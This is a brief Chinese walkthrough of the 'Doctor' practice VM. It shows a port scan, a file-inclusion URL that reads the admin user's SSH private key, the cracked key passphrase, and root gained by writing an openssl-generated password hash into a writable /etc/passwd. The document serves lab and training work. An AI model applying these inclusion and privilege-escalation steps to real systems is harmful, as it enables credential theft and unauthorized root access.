# 靶场练习
下载:Doctor
Nat,IP: 192.168.1.141
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | |
| ssh-hostkey: | |
| 2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA) | |
| 256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA) | |
|_ 256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519) | |
80/tcp open http Apache httpd 2.4.38 ((Debian)) | |
|_http-server-header: Apache/2.4.38 (Debian) | |
|_http-title: Docmed |
工具做信息收集做麻了毛都没有
点来点去发现有个不一样的功能点: http://192.168.1.141/doctor-item.php?include=Doctors.html
看上去文件包含,拿 id_rsa : http://192.168.1.141/doctor-item.php?include=/home/admin/.ssh/id_rsa
破解得到 passphrase: unicorn
登录
# 提权
发现 /etc/passwd 可以修改,那不稳了?
openssl passwd 123456 ,设置一个密码,得到返回的哈希
将 /etc/passwd 中 root 的 x 改成那个哈希
OK 了, su root ,用 123456 直接登录!
# 小结
passwd 可读写,就 G
